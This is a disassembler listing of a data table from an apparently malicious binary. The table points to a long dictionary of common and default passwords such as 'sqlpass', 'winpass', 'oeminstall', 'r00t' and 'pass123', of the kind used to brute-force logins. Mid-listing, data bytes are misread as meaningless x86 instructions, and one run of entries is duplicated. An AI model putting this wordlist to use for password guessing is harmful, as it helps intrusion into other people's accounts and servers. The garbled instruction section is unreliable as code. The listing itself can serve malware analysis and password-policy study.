dd offset aLife ; "life"
dd offset aLight ; "light"
dd offset aLightsab ; "lightsab"
dd offset aLima ; "lima"
dd offset aLimbaugh ; "limbaugh"
dd offset aLimited ; "limited"
dd offset aLinda ; "linda"
dd offset aLink ; "link"
dd offset aLinux ; "linux"
dd offset aLion ; "lion"
dd offset aLips ; "lips"
dd offset aLisa ; "lisa"
dd offset aLisp ; "lisp"
dd offset aLiteratu ; "literatu"
dd offset aLive ; "live"
dd offset aLiz ; "liz"
dd offset aLoad ; "load"
dd offset aLock ; "lock"
dd offset aLockout ; "lockout"
dd offset aLockword ; "lockword"
dd offset aLogic ; "logic"
dd offset aLoginpass ; "loginpass"
dd offset aLoginwor ; "loginwor"
dd offset aLogout ; "logout"
dd offset aLois ; "lois"
dd offset aLol ; "lol"
dd offset aLolopc ; "lolopc"
dd offset aLoose ; "loose"
dd offset aLore ; "lore"
dd offset aLori ; "lori"
dd offset aLorin ; "lorin"
dd offset aLorraine ; "lorraine"
dd offset aLoser ; "loser"
dd offset aLouis ; "louis"
dd offset aLove ; "love"
dd offset aLovebug ; "lovebug"
dd offset aLover ; "lover"
dd offset aLuck ; "luck"
dd offset aLucus ; "lucus"
dd offset aLucy ; "lucy"
dd offset aLude ; "lude"
dd offset aLuke ; "luke"
dd offset aLust ; "lust"
dd offset aLynn ; "lynn"
dd offset aLynne ; "lynne"
dd offset aMachine ; "machine"
dd offset aMacintos ; "macintos"
dd offset aMacintosh ; "macintosh"
dd offset aMack ; "mack"
dd offset aMacro ; "macro"
dd offset aMaggot ; "maggot"
dd offset aMagic ; "magic"
dd offset aMagnet ; "magnet"
dd offset aMail ; "mail"
dd offset aMain ; "main"
dd offset aMaint ; "maint"
dd offset aMalcolm ; "malcolm"
dd offset aMalcom ; "malcom"
dd offset aMana ; "mana"
dd offset aManager ; "manager"
dd offset aMara ; "mara"
dd offset aMarci ; "marci"
dd offset aMarcy ; "marcy"
dd offset aMaria ; "maria"
dd offset aMariens ; "mariens"
dd offset aMarietta ; "marietta"
dd offset aMarijuan ; "marijuan"
dd offset aMarines ; "marines"
dd offset aMark ; "mark"
dd offset aMarkus ; "markus"
dd offset aMarni ; "marni"
dd offset aMarriage ; "marriage"
dd offset aMars ; "mars"
dd offset aMarty ; "marty"
dd offset aMarvin ; "marvin"
dd offset aMary ; "mary"
dd offset aMason ; "mason"
dd offset aMass ; "mass"
dd offset aMaster ; "master"
dd offset aMath ; "math"
dd offset aMaurice ; "maurice"
dd offset aMeagan ; "meagan"
dd offset aMegabyte ; "megabyte"
dd offset aMegadeth ; "megadeth"
dd offset aMegan ; "megan"
dd offset aMelissa ; "melissa"
dd offset aMellon ; "mellon"
dd offset aMelrose ; "melrose"
dd offset aMember ; "member"
dd offset aMemory ; "memory"
dd offset aMenace ; "menace"
dd offset aMenu ; "menu"
dd offset aMercury ; "mercury"
dd offset aMegadeth ; "megadeth"
dd offset aMegan ; "megan"
dd offset aMelissa ; "melissa"
dd offset aMellon ; "mellon"
dd offset aMelrose ; "melrose"
dd offset aMember ; "member"
dd offset aMemory ; "memory"
dd offset aMenace ; "menace"
dd offset aMenu ; "menu"
dd offset aMercury ; "mercury"
dd offset aMerlin ; "merlin"
dd offset aMetal ; "metal"
dd offset aMetalhea ; "metalhea"
dd offset aMetalica ; "metalica"
dd offset aMets ; "mets"
dd offset aMgr ; "mgr"
dd offset aMice ; "mice"
dd offset aMichael ; "michael"
dd offset aMichel ; "michel"
dd offset aMichelan ; "michelan"
dd offset aMichele ; "michele"
dd offset aMichelle ; "michelle"
dd offset aMickey ; "mickey"
dd offset aMicro ; "micro"
dd offset aMicrochi ; "microchi"
dd offset aMicropro ; "micropro"
dd offset aMicrosof ; "microsof"
dd offset aMidieval ; "midieval"
dd offset aMike ; "mike"
dd offset aMine ; "mine"
dd offset aMinimum ; "minimum"
dd offset aMinsky ; "minsky"
dd offset aMirc_0 ; "mirc"
dd offset aMisfit ; "misfit"
dd offset aMission ; "mission"
dd offset aMit ; "mit"
dd offset aMkii ; "mkii"
dd offset aMode ; "mode"
dd offset aModem ; "modem"
dd offset aMogul ; "mogul"
dd offset aMoguls ; "moguls"
dd offset aMonday ; "monday"
dd offset aMonica ; "monica"
dd offset aMoom ; "moom"
dd offset aMoor ; "moor"
dd offset aMoose ; "moose"
dd offset aMore ; "more"
dd offset aMorley ; "morley"
dd offset aMorris ; "morris"
dd offset aMortal ; "mortal"
dd offset aMortalco ; "mortalco"
dd offset aMortgage ; "mortgage"
dd offset aMosaic ; "mosaic"
dd offset aMountain ; "mountain"
dd offset aMouse ; "mouse"
dd offset aMove ; "move"
dd offset aMovie ; "movie"
dd offset aMovies ; "movies"
dd offset aMozart ; "mozart"
dd offset aMpeg ; "mpeg"
dd offset aMsdos ; "msdos"
dd offset aMuppets ; "muppets"
dd offset aMutant ; "mutant"
dd offset aMypass ; "mypass"
dd offset aMypass123 ; "mypass123"
dd offset aMypc ; "mypc"
dd offset aMypc123 ; "mypc123"
dd offset aNagel ; "nagel"
dd offset aName ; "name"
dd offset aNancy ; "nancy"
dd offset aNapoleon ; "napoleon"
dd offset aNasa ; "nasa"
dd offset aNavy ; "navy"
dd offset aNeil ; "neil"
dd offset aNepenthe ; "nepenthe"
dd offset aNeptune ; "neptune"
dd offset aNess ; "ness"
dd offset aNet ; "net"
dd offset aNetDevil ; "net-devil"
dd offset aNetbios ; "netbios"
dd offset aNetdevil ; "netdevil"
dd offset aNetfuck ; "netfuck"
dd offset aNetscape ; "netscape"
dd offset aNetwork_0 ; "network"
dd offset aNew ; "new"
dd offset aNewborn ; "newborn"
dd offset aNews ; "news"
dd offset aNewsgrou ; "newsgrou"
dd offset aNewton ; "newton"
dd offset aNewyork ; "newyork"
dd offset aNext ; "next"
dd offset aNice ; "nice"
dd offset aNicole ; "nicole"
dd offset aNicotine ; "nicotine"
dd offset aNight ; "night"
dd offset aNightmar ; "nightmar"
dd offset aNintendo ; "nintendo"
dd offset aNita ; "nita"
dd offset aNnaacp ; "nnaacp"
dd offset aNoble ; "noble"
dd offset aNobody ; "nobody"
dd offset aNode ; "node"
dd offset aNokia ; "nokia"
dd offset aNone ; "none"
dd offset aNoob ; "noob"
dd offset aNoreen ; "noreen"
dd offset aNotes ; "notes"
dd offset aNoth ; "noth"
dd offset aNova ; "nova"
dd offset aNovel ; "novel"
dd offset aNovember ; "november"
dd offset aNoxious ; "noxious"
dd offset aNuclear ; "nuclear"
dd offset aNude ; "nude"
dd offset aNuke ; "nuke"
dd offset aNukem ; "nukem"
dd offset aNull_1 ; "null"
dd offset aNumber ; "number"
dd offset aNutritio ; "nutritio"
dd offset aNutrition ; "nutrition"
dd offset aNuts ; "nuts"
dd offset aNyquist ; "nyquist"
dd offset aObscurit ; "obscurit"
dd offset aOceanogr ; "oceanogr"
dd offset aOceanography ; "oceanography"
dd offset aOcelot ; "ocelot"
dd offset aOeminstall ; "oeminstall"
dd offset aOemuser ; "oemuser"
dd offset aOffice ; "office"
dd offset aOkay ; "okay"
dd offset aOldage ; "oldage"
dd offset aOlivetti ; "olivetti"
dd offset aOlivia ; "olivia"
dd offset aOmega ; "omega"
dd offset aOpen ; "open"
dd offset aOpening ; "opening"
dd offset aOpenlock ; "openlock"
dd offset aOpensesa ; "opensesa"
dd offset aOperator ; "operator"
dd offset aOracle ; "oracle"
dd offset aOrange ; "orange"
dd offset aOrca ; "orca"
dd offset aOrient ; "orient"
dd offset aOrwell ; "orwell"
dd offset aOscar ; "oscar"
dd offset aOsiris ; "osiris"
dd offset aOutdoors ; "outdoors"
dd offset aOutlaw ; "outlaw"
dd offset aOutlook ; "outlook"
dd offset aOutput ; "output"
dd offset aOutside ; "outside"
dd offset aOwa ; "owa"
dd offset aOwn ; "own"
dd offset aOwned ; "owned"
dd offset aOxford ; "oxford"
dd offset aPacific ; "pacific"
dd offset aPackard ; "packard"
dd offset aPacker ; "packer"
dd offset aPad ; "pad"
dd offset aPainless ; "painless"
dd offset aPaint ; "paint"
dd offset aPakistan ; "pakistan"
dd offset aPam ; "pam"
dd offset aPamela ; "pamela"
dd offset aPapa ; "papa"
dd offset aPaper ; "paper"
dd offset aPapers ; "papers"
dd offset aPascal ; "pascal"
dd offset aPass_0 ; "pass"
dd offset aPass123 ; "pass123"
dd offset aPass1234 ; "pass1234"
dd offset aPassphra ; "passphra"
dd offset aPasswd ; "passwd"
dd offset aPassword1 ; "password1"
dd offset aPassword123 ; "password123"
dd offset aPaste ; "paste"
dd offset aPat ; "pat"
dd offset aPatricia ; "patricia"
dd offset aPatrick ; "patrick"
dd offset aPatriot ; "patriot"
dd offset aPatty ; "patty"
dd offset aPaula ; "paula"
dd offset aPc ; "pc"
dd offset aPeanuts ; "peanuts"
dd offset aPecker ; "pecker"
dd offset aPencil ; "pencil"
dd offset aPenelope ; "penelope"
dd offset aPenguin ; "penguin"
dd offset aPenis ; "penis"
dd offset aPenname ; "penname"
dd offset aPentagon ; "pentagon"
dd offset aPentagra ; "pentagra"
dd offset aPenthous ; "penthous"
dd offset aPentium ; "pentium"
dd offset aPeoria ; "peoria"
dd offset aPepper ; "pepper"
dd offset aPepsi ; "pepsi"
dd offset aPercolat ; "percolat"
dd offset aPercolate ; "percolate"
dd offset aPerfect ; "perfect"
dd offset aPermit ; "permit"
dd offset aPersimmo ; "persimmo"
dd offset aPersimmon ; "persimmon"
dd offset aPersona ; "persona"
dd offset aPervert ; "pervert"
dd offset aPete ; "pete"
dd offset aPeter ; "peter"
dd offset aPhil ; "phil"
dd offset aPhilip ; "philip"
dd offset aPhoenix ; "phoenix"
dd offset aPhone ; "phone"
dd offset aPhoton ; "photon"
dd offset aPhrack ; "phrack"
dd offset aPhrase ; "phrase"
dd offset aPhreak ; "phreak"
dd offset aPhuck ; "phuck"
dd offset aPick ; "pick"
dd offset aPierre ; "pierre"
dd offset aPimp ; "pimp"
dd offset aPink ; "pink"
dd offset aPinname ; "pinname"
dd offset aPiss ; "piss"
dd offset aPizza ; "pizza"
dd offset aPlane ; "plane"
dd offset aPlayboy ; "playboy"
dd offset aPlover ; "plover"
dd offset aPluto ; "pluto"
dd offset aPlymouth ; "plymouth"
dd offset aPoetry ; "poetry"
dd offset aPolice ; "police"
dd offset aPolly ; "polly"
dd offset aPolynomi ; "polynomi"
dd offset aPolynomial ; "polynomial"
dd offset aPonderin ; "ponderin"
dd offset aPondering ; "pondering"
dd offset aPoop ; "poop"
dd offset aPoor ; "poor"
dd offset aPork ; "pork"
dd offset aPorn ; "porn"
dd offset aPorno ; "porno"
dd offset aPorsche ; "porsche"
dd offset aPost ; "post"
dd offset aPoster ; "poster"
dd offset aPower ; "power"
dd offset aPraise ; "praise"
dd offset aPrecious ; "precious"
dd offset aPrelude ; "prelude"
dd offset aPresto ; "presto"
dd offset aPrince ; "prince"
dd offset aPrinceto ; "princeto"
dd offset aPrinceton ; "princeton"
dd offset aPrinter ; "printer"
dd offset aPriv ; "priv"
dd offset aPrivate ; "private"
dd offset aPrivs ; "privs"
dd offset aProceed ; "proceed"
dd offset aProcesso ; "processo"
dd offset aProfesso ; "professo"
dd offset aProfessor ; "professor"
dd offset aProfile ; "profile"
dd offset aProgram ; "program"
dd offset aPrompt ; "prompt"
dd offset aProtect ; "protect"
dd offset aProtozoa ; "protozoa"
dd offset aPsycho ; "psycho"
dd offset aPsychopa ; "psychopa"
dd offset aPub ; "pub"
dd offset aPublic ; "public"
dd offset aPuck ; "puck"
dd offset aPuke ; "puke"
dd offset aPumpkin ; "pumpkin"
dd offset aPuneet ; "puneet"
dd offset aPunisher ; "punisher"
dd offset aPunk ; "punk"
dd offset aPuppet ; "puppet"
dd offset aPussy ; "pussy"
dd offset aPw ; "pw"
dd offset aPw123 ; "pw123"
dd offset aPwd ; "pwd"
dd offset aQaz ; "qaz"
dd offset aQuebec ; "quebec"
dd offset aQwe ; "qwe"
dd offset aQwer ; "qwer"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aR00t ; "r00t"
dd offset aRabbit ; "rabbit"
dd offset aRachel ; "rachel"
dd offset aRachelle ; "rachelle"
dd offset aRachmani ; "rachmani"
dd offset aRachmaninoff ; "rachmaninoff"
dd offset aRaid ; "raid"
dd offset aRain ; "rain"
dd offset aRainbow ; "rainbow"
dd offset aRaindrop ; "raindrop"
dd offset aRaleigh ; "raleigh"
dd offset aRandom ; "random"
dd offset aRape ; "rape"
dd offset aRascal ; "rascal"
dd offset aRazor ; "razor"
dd offset aReagan ; "reagan"
dd offset aReality ; "reality"
dd offset aReally ; "really"
dd offset aReam ; "ream"
dd offset aReaper ; "reaper"
dd offset aRebal ; "rebal"
dd offset aRebecca ; "rebecca"
dd offset aRebel ; "rebel"
dd offset aRecord ; "record"
dd offset aReddawn ; "reddawn"
dd offset aRedhead ; "redhead"
dd offset aReferenc ; "referenc"
dd offset aRegional ; "regional"
dd offset aRelease ; "release"
dd offset aRemote ; "remote"
dd offset aRenee ; "renee"
dd offset aReno ; "reno"
dd offset aRent ; "rent"
dd offset aReport ; "report"
dd offset aRepublic ; "republic"
dd offset aResistan ; "resistan"
dd offset aReveal ; "reveal"
dd offset aRhino ; "rhino"
dd offset aRich ; "rich"
dd offset aRick ; "rick"
dd offset aRiffraff ; "riffraff"
dd offset aRight ; "right"
dd offset aRightwin ; "rightwin"
dd offset aRing ; "ring"
dd offset aRiot ; "riot"
dd offset aRipple ; "ripple"
dd offset aRisc ; "risc"
dd offset aRje ; "rje"
dd offset aRoach ; "roach"
dd offset aRobert ; "robert"
dd offset aRobin ; "robin"
dd offset aRobot ; "robot"
dd offset aRobotics ; "robotics"
dd offset aRobyn ; "robyn"
dd offset aRochelle ; "rochelle"
dd offset aRocheste ; "rocheste"
dd offset aRochester ; "rochester"
dd offset aRock ; "rock"
dd offset aRocky ; "rocky"
dd offset aRockyhor ; "rockyhor"
dd offset aRodent ; "rodent"
dd offset aRolex ; "rolex"
dd offset aRomano ; "romano"
dd offset aRomeo ; "romeo"
dd offset aRomulan ; "romulan"
dd offset aRon ; "ron"
dd offset aRonald ; "ronald"
dd offset aRooted ; "rooted"
dd offset aRose ; "rose"
dd offset aRosebud ; "rosebud"
dd offset aRosemary ; "rosemary"
dd offset aRoses ; "roses"
dd offset aRough ; "rough"
dd offset aRubber ; "rubber"
dd offset aRuben ; "ruben"
dd offset aRuby ; "ruby"
dd offset aRude ; "rude"
dd offset aRules ; "rules"
dd offset aRunning ; "running"
dd offset aRush ; "rush"
dd offset aRuth ; "ruth"
dd offset aSa ; "sa"
dd offset aSafe ; "safe"
dd offset aSage ; "sage"
dd offset aSal ; "sal"
dd offset aSalami ; "salami"
dd offset aSale ; "sale"
dd offset aSalt ; "salt"
dd offset aSam ; "sam"
dd offset aSamantha ; "samantha"
dd offset aSample ; "sample"
dd offset aSandra ; "sandra"
dd offset aSandy ; "sandy"
dd offset aSara ; "sara"
dd offset aSarah ; "sarah"
dd offset aSatan ; "satan"
dd offset aSatanic ; "satanic"
dd offset aSatanik ; "satanik"
dd offset aSaturday ; "saturday"
dd offset aSaturn ; "saturn"
dd offset aSaxon ; "saxon"
dd offset aScamper ; "scamper"
dd offset aScheme ; "scheme"
dd offset aSchool ; "school"
dd offset aSchoolsucks ; "schoolsucks"
dd offset aScifi ; "scifi"
dd offset aScorpion ; "scorpion"
dd offset aScott ; "scott"
dd offset aScotty ; "scotty"
dd offset aScout ; "scout"
dd offset aScript ; "script"
dd offset aScriptkiddie ; "scriptkiddie"
dd offset aSearch ; "search"
dd offset aSecret ; "secret"
dd offset aSecurity ; "security"
dd offset aSeed ; "seed"
dd offset aSega ; "sega"
dd offset aSensor ; "sensor"
dd offset aSentinel ; "sentinel"
dd offset aSentry ; "sentry"
dd offset aSerenity ; "serenity"
dd offset aSerial_0 ; "serial"
dd offset aService ; "service"
dd offset aSesame ; "sesame"
dd offset aSex_0 ; "sex"
dd offset aSexy ; "sexy"
dd offset aShannon ; "shannon"
dd offset aSharc ; "sharc"
dd offset aShark ; "shark"
dd offset aSharks ; "sharks"
dd offset aSharon ; "sharon"
dd offset aSheffiel ; "sheffiel"
dd offset aSheffield ; "sheffield"
dd offset aSheldon ; "sheldon"
dd offset aShell ; "shell"
dd offset aSherri ; "sherri"
dd offset aShift ; "shift"
dd offset aShirley ; "shirley"
dd offset aShit ; "shit"
dd offset aShitpot ; "shitpot"
dd offset aShiva ; "shiva"
dd offset aShivers ; "shivers"
dd offset aShort ; "short"
dd offset aShuttle ; "shuttle"
dd offset aSick ; "sick"
dd offset aSiemens ; "siemens"
dd offset aSierra ; "sierra"
dd offset aSignatur ; "signatur"
dd offset aSignature ; "signature"
dd offset aSilver ; "silver"
dd offset aSimcity ; "simcity"
dd offset aSimon ; "simon"
dd offset aSimple ; "simple"
dd offset aSimpsons ; "simpsons"
dd offset aSimulati ; "simulati"
dd offset aSinger ; "singer"
dd offset aSingle ; "single"
dd offset aSite ; "site"
dd offset aSkull ; "skull"
dd offset aSlave ; "slave"
dd offset aSlick ; "slick"
dd offset aSliders ; "sliders"
dd offset aSlow ; "slow"
dd offset aSlut ; "slut"
dd offset aSmall ; "small"
dd offset aSmart ; "smart"
dd offset aSmile ; "smile"
dd offset aSmiles ; "smiles"
dd offset aSmooch ; "smooch"
dd offset aSmother ; "smother"
dd offset aSmtp ; "smtp"
dd offset aSmut ; "smut"
dd offset aSnach ; "snach"
dd offset aSnafu ; "snafu"
dd offset aSnake ; "snake"
dd offset aSnatch ; "snatch"
dd offset aSnoopy ; "snoopy"
dd offset aSoap ; "soap"
dd offset aSocial ; "social"
dd offset aSocrates ; "socrates"
dd offset aSodomy ; "sodomy"
dd offset aSoft ; "soft"
dd offset aSoftware ; "software"
dd offset aSomebody ; "somebody"
dd offset aSondra ; "sondra"
dd offset aSonia ; "sonia"
dd offset aSonic ; "sonic"
dd offset aSonya ; "sonya"
dd offset aSossina ; "sossina"
dd offset aSource ; "source"
dd offset aSouth ; "south"
dd offset aSpaceman ; "spaceman"
dd offset aSpaceshi ; "spaceshi"
dd offset aSparrows ; "sparrows"
dd offset aSpear ; "spear"
dd offset aSpell ; "spell"
dd offset aSpencer ; "spencer"
dd offset aSpice ; "spice"
dd offset aSpider ; "spider"
dd offset aSpiderma ; "spiderma"
dd offset aSpit ; "spit"
dd offset aSpred ; "spred"
dd offset aSpring ; "spring"
dd offset aSpringer ; "springer"
dd offset aSpunk ; "spunk"
dd offset aSql ; "sql"
dd offset aSqlagent ; "sqlagent"
dd offset aSqlpass ; "sqlpass"
dd offset aSquires ; "squires"
dd offset aSr71 ; "sr71"
dd offset aStacey ; "stacey"
dd offset aStaci ; "staci"
dd offset aStacie ; "stacie"
dd offset aStacy ; "stacy"
dd offset aStaff ; "staff"
dd offset aStar ; "star"
dd offset aStarship ; "starship"
dd offset aStart ; "start"
dd offset aStartrek ; "startrek"
dd offset aStartup ; "startup"
dd offset aStarwars ; "starwars"
dd offset aSteak ; "steak"
dd offset aSteal ; "steal"
dd offset aSteel ; "steel"
dd offset aSteph ; "steph"
dd offset aStephani ; "stephani"
dd offset aStephanie ; "stephanie"
dd offset aStereo ; "stereo"
dd offset aSteve ; "steve"
dd offset aStoneage ; "stoneage"
dd offset aStoned ; "stoned"
dd offset aStones ; "stones"
dd offset aStrange ; "strange"
dd offset aStrangle ; "strangle"
dd offset aStratfor ; "stratfor"
dd offset aStratford ; "stratford"
dd offset aStreetfi ; "streetfi"
dd offset aString ; "string"
dd offset aStrip ; "strip"
dd offset aStudent ; "student"
dd offset aStudent1 ; "student1"
dd offset aStuttgar ; "stuttgar"
dd offset aStuttgart ; "stuttgart"
dd offset aSubscrib ; "subscrib"
dd offset aSubway ; "subway"
dd offset aSuccess ; "success"
dd offset aSuck ; "suck"
dd offset aSuckmydi ; "suckmydi"
dd offset aSucks ; "sucks"
dd offset aSue ; "sue"
dd offset aSummer ; "summer"
dd offset aSun ; "sun"
dd offset aSunday ; "sunday"
dd offset aSuper ; "super"
dd offset aSuperman ; "superman"
dd offset aSuperson ; "superson"
dd offset aSupersta ; "supersta"
dd offset aSuperstage ; "superstage"
dd offset aSuperuse ; "superuse"
dd offset aSuperuser ; "superuser"
dd offset aSupervis ; "supervis"
dd offset aSupport ; "support"
dd offset aSupporte ; "supporte"
dd offset aSupported ; "supported"
dd offset aSurfer ; "surfer"
dd offset aSurfing ; "surfing"
dd offset aSusan ; "susan"
dd offset aSusanne ; "susanne"
dd offset aSusie ; "susie"
dd offset aSuzanne ; "suzanne"
dd offset aSuzie ; "suzie"
dd offset aSwearer ; "swearer"
dd offset aSweat ; "sweat"
dd offset aSwitch ; "switch"
dd offset aSword ; "sword"
dd offset aSybase ; "sybase"
dd offset aSybil ; "sybil"
dd offset aSymmetry ; "symmetry"
dd offset aSys ; "sys"
dd offset aSysadmin ; "sysadmin"
dd offset aSysop ; "sysop"
dd offset aTabasco ; "tabasco"
dd offset aTalk ; "talk"
dd offset aTall ; "tall"
dd offset aTamara ; "tamara"
dd offset aTami ; "tami"
dd offset aTamie ; "tamie"
dd offset aTammy ; "tammy"
dd offset aTangerin ; "tangerin"
dd offset aTangerine ; "tangerine"
dd offset aTango ; "tango"
dd offset aTape ; "tape"
dd offset aTara ; "tara"
dd offset aTarget ; "target"
dd offset aTarragon ; "tarragon"
dd offset aTaylor ; "taylor"
dd offset aTeacher ; "teacher"
dd offset aTeam ; "team"
dd offset aTeapot ; "teapot"
dd offset aTears ; "tears"
; ---------------------------------------------------------------------------
loc_42DE30: ; CODE XREF: .text:loc_42DE30�j
jo short loc_42DE30
inc edx
add [esi+edi*8+42h], ah
add [esi+edi*8+42h], bl
add [esi+edi*8+42h], dl
add [eax-2], cl
inc edx
add [esi+edi*8], bh
inc edx
add [esi+edi*8], dh
inc edx
add [esi+edi*8], ch
inc edx
add [esi+edi*8], ah
inc edx
add [eax], bl
inc byte ptr [edx+0]
or al, 0FEh
inc edx
add [esi+edi*8], al
inc edx
add ah, bh
std
inc edx
add al, dh
std
inc edx
add ah, ah
std
inc edx
add ah, bl
std
inc edx
add ah, dl
std
inc edx
add ah, cl
std
inc edx
add ah, al
std
inc edx
add [ebp+edi*8-24BFFBEh], bh
inc edx
add [ebp+edi*8-25FFFBEh], ch
inc edx
add [eax-6FFFBD03h], bl
std
inc edx
add [ebp+edi*8-283FFBEh], al
inc edx
add [ebp+edi*8+42h], dh
add [ebp+edi*8+42h], ch
add [ebp+edi*8+42h], ah
add [ebp+edi*8+42h], bl
add [ebp+edi*8+42h], dl
add [ebp+edi*8+42h], cl
add [ebp+edi*8+42h], al
add [eax], bh
std
inc edx
add [eax], dh
std
inc edx
add ds:0FD180042h[edi*8], ah
inc edx
add ds:0FD040042h[edi*8], cl
inc edx
add ah, bh
cld
inc edx
add ah, dh
cld
inc edx
add ah, ch
cld
inc edx
add ah, ah
cld
inc edx
add ah, bl
cld
inc edx
add al, dl
cld
inc edx
add al, cl
cld
inc edx
add [esp+edi*8-34BFFBEh], bh
inc edx
add [esp+edi*8-35BFFBEh], ch
inc edx
add [esp+edi*8-36BFFBEh], bl
inc edx
add [eax-7FFFBD04h], cl
cld
inc edx
add [eax-4], bh
inc edx
add [eax-4], dh
inc edx
add [esp+edi*8+42h], ch
add [esp+edi*8+42h], ah
add [esp+edi*8+42h], bl
add [esp+edi*8+42h], dl
add [esp+edi*8+42h], cl
add [esp+edi*8+42h], al
add [esp+edi*8], bh
inc edx
add [esp+edi*8], dh
inc edx
add [esp+edi*8], ch
inc edx
add [esp+edi*8], ah
inc edx
add [esp+edi*8], bl
inc edx
add [esp+edi*8], dl
inc edx
add [esp+edi*8], cl
inc edx
; ---------------------------------------------------------------------------
db 0
dd offset aUniversa ; "universa"
dd offset aUniverse ; "universe"
dd offset aUniversi ; "universi"
dd offset aUnix ; "unix"
dd offset aUnlock ; "unlock"
dd offset aUpload ; "upload"
dd offset aUranus ; "uranus"
dd offset aUrchin ; "urchin"
dd offset aUrsula ; "ursula"
dd offset aUsenet ; "usenet"
dd offset aUser1 ; "user1"
dd offset aUsermane ; "usermane"
dd offset aUsername ; "username"
dd offset aUserpassword ; "userpassword"
dd offset aUsmc ; "usmc"
dd offset aUtil ; "util"
dd offset aUtility ; "utility"
dd offset aUucp ; "uucp"
dd offset aUwontguessme ; "uwontguessme"
dd offset aVagina ; "vagina"
dd offset aValerie ; "valerie"
dd offset aVampire ; "vampire"
dd offset aVasant ; "vasant"
dd offset aVenus ; "venus"
dd offset aVeronica ; "veronica"
dd offset aVertigo ; "vertigo"
dd offset aVicky ; "vicky"
dd offset aVictor ; "victor"
dd offset aVideo ; "video"
dd offset aVideogam ; "videogam"
dd offset aVillage ; "village"
dd offset aVirgin ; "virgin"
dd offset aVirginia ; "virginia"
dd offset aVirus ; "virus"
dd offset aVisitor ; "visitor"
dd offset aVisual ; "visual"
dd offset aVisualba ; "visualba"
dd offset aVodka ; "vodka"
dd offset aW00t ; "w00t"
dd offset aWaco ; "waco"
dd offset aWard ; "ward"
dd offset aWarez ; "warez"
dd offset aWarfare ; "warfare"
dd offset aWargames ; "wargames"
dd offset aWarp ; "warp"
dd offset aWarren ; "warren"
dd offset aWasp ; "wasp"
dd offset aWatchwor ; "watchwor"
dd offset aWater ; "water"
dd offset aWave ; "wave"
dd offset aWeb ; "web"
dd offset aWebpage ; "webpage"
dd offset aWednesda ; "wednesda"
dd offset aWeed ; "weed"
dd offset aWeenie ; "weenie"
dd offset aWell ; "well"
dd offset aWendi ; "wendi"
dd offset aWendy ; "wendy"
dd offset aWerewolf ; "werewolf"
dd offset aWest ; "west"
dd offset aWestern ; "western"
dd offset aWh0r3 ; "wh0r3"
dd offset aWh0re ; "wh0re"
dd offset aWhatever ; "whatever"
dd offset aWhatnot ; "whatnot"
dd offset aWhisky ; "whisky"
dd offset aWhite ; "white"
dd offset aWhiting ; "whiting"
dd offset aWhitney ; "whitney"
dd offset aWholesal ; "wholesal"
dd offset aWholesale ; "wholesale"
dd offset aWhore ; "whore"
dd offset aWileecoyote ; "wileecoyote"
dd offset aWill ; "will"
dd offset aWilliam ; "william"
dd offset aWilliams ; "williams"
dd offset aWilliamsburg ; "williamsburg"
dd offset aWillie ; "willie"
dd offset aWilma ; "wilma"
dd offset aWin ; "win"
dd offset aWin2000 ; "win2000"
dd offset aWin2k ; "win2k"
dd offset aWin98 ; "win98"
dd offset aWindose ; "windose"
dd offset aWindows ; "windows"
dd offset aWindows2k ; "windows2k"
dd offset aWindows95 ; "windows95"
dd offset aWindows98 ; "windows98"
dd offset aWindowsme ; "windowsME"
dd offset aWindowz ; "windowz"
dd offset aWindoze ; "windoze"
dd offset aWindoze2k ; "windoze2k"
dd offset aWindoze95 ; "windoze95"
dd offset aWindoze98 ; "windoze98"
dd offset aWindozeme ; "windozeME"
dd offset aWindozexp ; "windozexp"
dd offset aWine ; "wine"
dd offset aWing ; "wing"
dd offset aWinnt ; "winnt"
dd offset aWinpass ; "winpass"
dd offset aWinston ; "winston"
dd offset aWinxp ; "winxp"
dd offset aWired ; "wired"
dd offset aWisconsi ; "wisconsi"
dd offset aWisconsin ; "wisconsin"
dd offset aWiseass ; "wiseass"
dd offset aWithin ; "within"
dd offset aWizard ; "wizard"
dd offset aWolf ; "wolf"
dd offset aWolverin ; "wolverin"
dd offset aWoman ; "woman"
dd offset aWombat ; "wombat"
dd offset aWomen ; "women"
dd offset aWood ; "wood"
dd offset aWoodwind ; "woodwind"
dd offset aWord ; "word"
dd offset aWordperf ; "wordperf"
dd offset aWorf ; "worf"
dd offset aWork ; "work"
dd offset aWorm ; "worm"
dd offset aWormwood ; "wormwood"
dd offset aWwii ; "wwii"
dd offset aWww ; "www"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWyoming ; "wyoming"
dd offset asc_43362C ; "x"
dd offset aXena ; "xena"
dd offset aXfer ; "xfer"
dd offset aXman ; "xman"
dd offset aXmen ; "xmen"
dd offset aXmodem ; "xmodem"
dd offset aXp_0 ; "xp"
dd offset aXray ; "xray"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset aXyz ; "xyz"
dd offset aXyzzy ; "xyzzy"
dd offset aYaco ; "yaco"
dd offset aYang ; "yang"
dd offset aYankee ; "yankee"
dd offset aYellow ; "yellow"
dd offset aYellowst ; "yellowst"
dd offset aYellowstone ; "yellowstone"
dd offset aYolanda ; "yolanda"
dd offset aYosemite ; "yosemite"
dd offset aYoung ; "young"
dd offset aYouwontguessme ; "youwontguessme"
dd offset aYxcv ; "yxcv"
dd offset aZap ; "zap"
dd offset aZebra ; "zebra"
dd offset aZeitgeis ; "zeitgeis"
dd offset aZiggy ; "ziggy"
dd offset aZimmerma ; "zimmerma"
dd offset aZimmerman ; "zimmerman"
dd offset aZmodem ; "zmodem"
dd offset aZombie ; "zombie"
dd offset aZulu ; "zulu"
dd offset aZxc ; "zxc"
dd offset aZxcv ; "zxcv"
dd offset asc_4335F4 ; "%"
dd offset dword_42F650
dd offset dword_42F64C
dd offset dword_42F648
dd offset a@_10 ; "!@#$%"
dd offset a@_9 ; "!@#$%^"
dd offset a@_8 ; "!@#$%^&"
dd offset a@_7 ; "!@#$%^&*"
dd offset loc_426447+1
dd offset dword_42F644
dd offset off_42F640
dd offset a@_6 ; "@"
dd offset a@@ ; "@@"
dd offset asc_42F634 ; "+"
dd offset asc_42F630 ; "++"
dd offset asc_42F62C ; "+++"
dd offset asc_42F624 ; "++++"
dd offset asc_42F620 ; "-"
dd offset asc_42F61C ; "--"
